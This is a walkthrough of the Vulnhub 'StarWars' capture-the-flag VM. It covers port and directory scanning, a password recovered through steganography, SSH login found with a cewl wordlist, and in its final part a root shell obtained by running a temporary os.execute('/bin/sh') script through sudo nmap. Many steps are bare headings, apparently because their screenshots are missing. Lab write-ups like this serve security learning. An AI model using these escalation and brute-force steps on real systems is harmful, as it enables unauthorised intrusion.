Vulnhub: StarWars

This is a beginner level VM from Vulnhub. Star-wars themed 😍

Scanning:

root@kali:~#​ nmap​ -PS 192.168.57.15
Starting Nmap 7.80 ( https://​ nmap​ .org ) at 2020-09-06 17:16 EDT
Nmap scan report ​ for​ 192.168.57.15
Host ​ is​ ​ up​ (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp ​ open​ ssh
80/tcp ​ open​ http

Checking out the Web Server:

Checking the page source:

Decoding from base64:

Decoding from Binary:

Web: Enumeration:

root@kali:~#​ ​dirb​ http://192.168.57.15

GENERATED​ WORDS: ​ 4612
-​ ---​ ​ Scanning​ URL: http://192.168.57.15/ ​ ----
+​ http://192.168.57.15/admin ​ (CODE:200|SIZE:3753)
==>​ DIRECTORY: http://192.168.57.15//assets/images/
+​ http://192.168.57.15/index.html ​ (CODE:200|SIZE:548)
==>​ DIRECTORY: http://192.168.57.15/javascript/
==>​ DIRECTORY: http://192.168.57.15/manual/
+​ http://192.168.57.15/robots.txt ​ (CODE:200|SIZE:105)
+​ http://192.168.57.15/server-status ​ (CODE:403|SIZE:278)
+​ http://192.168.57.15/wordpress ​ (CODE:200|SIZE:54)

Checking wordpress:

Checking out admin:

There is nothing there, the login does not actually go anywhere:

Checking robots.txt:

Checking out r2d2:

Creating a wordlist from this page, there are several star wars words on the page (tatooine, obi wan, etc):

Downloading the two /assets/images (2 yodas seen on home page):

You can see they are vastly different sizes, there might be something hidden in one.

Stego:

Running stegoveritas on yoda.png:

Result:

root​@kali​:~/Downloads/results/keepers​# cat 1599426719.9636476
the real password is babyYoda123

SSH Login:

Finding the username to go with the password:

Trying the cewl wordlist:

Using a star wars wordlist:

Login to SSH:

Oops I missed this:

Trying the cewl wordlist with skywalker:

Privilege Escalation:

Logging in as skywalker:

This file suggests Darth must have a cronjob running:

skywalker​@starwars​:~​$ ​cat .secrets/note.txt
Darth must take up the job of being a good father
skywalker​@starwars​:~$ ​id -a
uid=​1001(skywalker) gid=​1001​(skywalker) groups=​1001​(skywalker),​2000​(anakin)

This must be the script run for the job, it must run every minute.

skywalker​@starwars​:/home/Darth/​.secrets​$ ​cat evil.py
# Let the fear flow through you every single minute
fear = ​ 1
anger = fear
hate = anger
suffering = hate

I looked for the job couldn’t find it.

“Cheating” at Priv Esc:

Used this to get the password for Darth. (The creator of this box forgot to clear the command history) Combine these into luke12clone50, and log in to Darth.

Checking crontab:

Oops I really messed up there.

Use nmap to get a root shell:

Use mktemp to create a temporary file that can be executed with the nmap script param

Darth​@starwars​:/home/skywalker​$ TF=​$(mktemp)
Darth​@starwars​:/home/skywalker​$ echo ​ 'os.execute("/bin/sh")'​ > ​ $TF
Darth​@starwars​:/home/skywalker​$ sudo nmap --script=​ $TF

Root Flag:

FIN.